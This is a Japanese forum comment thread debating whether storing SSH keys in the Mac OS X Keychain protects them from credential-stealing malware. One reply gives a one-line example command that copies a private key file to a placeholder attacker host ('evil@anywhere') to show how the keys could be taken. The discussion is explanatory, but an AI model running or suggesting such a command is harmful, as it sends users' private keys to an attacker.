アカウント名:
パスワード:
マルウェアを自機に招き入れた時点で、自分の権限でできる何をされてもおかしくはないと思うんだけど。現時点における主要ターゲットがその人気FTPクライアントであることは事実だろうけど、乗り換えたところでそれは「Macなら安心」程度の対策でしかない。
「Macなら安心」程度の対策でしかない。
Mac OS X 10.5 から Keychain.app に ssh-agent の機能が追加されたので、私はここに SSH の鍵を登録して安心しています。(使い方は man ssh-add しましょう)
$ ssh-add -K /path/to/private_key_file
# という話ではない?
という話ではない。
$ scp /path/to/private_key_file evil@anywhere:~/
そのためのパスフレーズとパスフレーズのキーチェインへの保管でしょう。
キーチェイン自体 (~/Library/Keychains/*) だって盗まれる可能性はありますが、ログインパスワードで暗号化されているので簡単には割れないというお話です。
Mac OS X自体はパスフレーズが要求されたとき、暗号化をどうやって解除するのですか?ログインパスワードの入力を改めて要求するのでしょうか?
今手元になく記憶に頼って書いているので曖昧ですが、たしか、Mac OS X のキーチェーンアクセスは、キーチェーンへのアクセスが発生したとき、ログインパスワードとキーチェーンのパスワードが同一であれば何の入力も求めてきません。異なっている場合はキーチェーンパスワードの入力を求めてきます。
通常はログインパスワードとキーチェーンパスワードは同一なので聞かれることはありませんが、アカウント情報をLDAPサーバとかに依存しているような場合(学校とか企業とか)だと、キーチェーンパスワードの入力を要求されることがありますね。# キーチェーンパスワードを変更してあげればもちろん入力要求されなくなります。
何も聞かれないなら、Mac OS Xはキーチェーンへのアクセスが正規のクライアントからのものかマルウェアからのものかどうやって区別しているのでしょうか。区別できないならCryptProtectData [hatena.ne.jp]をNULL, NULLで使った場合と大して変わらないような…。「今まで誰もキーチェーンにそんな攻撃をしたことがない」というなら、元コメントに戻って> 「Macなら安心」程度の対策でしかない。としか言いようがありません。まあ「suのプロンプトが出たらトロイの木馬と思え」という格言もあるくらいですから、何でもかんでもパスワードを聞けばいいというものでもありませんが。
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
一つのことを行い、またそれをうまくやるプログラムを書け -- Malcolm Douglas McIlroy
そもそもマルウェアを拾った時点で (スコア:3, すばらしい洞察)
マルウェアを自機に招き入れた時点で、自分の権限でできる何をされてもおかしくはないと思うんだけど。
現時点における主要ターゲットがその人気FTPクライアントであることは事実だろうけど、乗り換えたところでそれは
「Macなら安心」程度の対策でしかない。
Re:そもそもマルウェアを拾った時点で (スコア:3, 参考になる)
Mac OS X 10.5 から Keychain.app に ssh-agent の機能が追加されたので、私はここに SSH の鍵を登録して安心しています。(使い方は man ssh-add しましょう)
# という話ではない?
Re: (スコア:0)
という話ではない。
Re: (スコア:0)
Re:そもそもマルウェアを拾った時点で (スコア:2)
そのためのパスフレーズとパスフレーズのキーチェインへの保管でしょう。
キーチェイン自体 (~/Library/Keychains/*) だって盗まれる可能性はありますが、ログインパスワードで暗号化されているので簡単には割れないというお話です。
Re: (スコア:0)
Mac OS X自体はパスフレーズが要求されたとき、暗号化をどうやって解除するのですか?
ログインパスワードの入力を改めて要求するのでしょうか?
キーチェーンアクセス (スコア:1)
今手元になく記憶に頼って書いているので曖昧ですが、たしか、
Mac OS X のキーチェーンアクセスは、キーチェーンへのアクセスが発生したとき、
ログインパスワードとキーチェーンのパスワードが同一であれば何の入力も求めてきません。
異なっている場合はキーチェーンパスワードの入力を求めてきます。
通常はログインパスワードとキーチェーンパスワードは同一なので聞かれることはありませんが、
アカウント情報をLDAPサーバとかに依存しているような場合(学校とか企業とか)だと、
キーチェーンパスワードの入力を要求されることがありますね。
# キーチェーンパスワードを変更してあげればもちろん入力要求されなくなります。
Re: (スコア:0)
何も聞かれないなら、Mac OS Xはキーチェーンへのアクセスが正規のクライアントからのものかマルウェアからのものかどうやって区別しているのでしょうか。区別できないならCryptProtectData [hatena.ne.jp]をNULL, NULLで使った場合と大して変わらないような…。「今まで誰もキーチェーンにそんな攻撃をしたことがない」というなら、元コメントに戻って
> 「Macなら安心」程度の対策でしかない。
としか言いようがありません。
まあ「suのプロンプトが出たらトロイの木馬と思え」という格言もあるくらいですから、何でもかんでもパスワードを聞けばいいというものでもありませんが。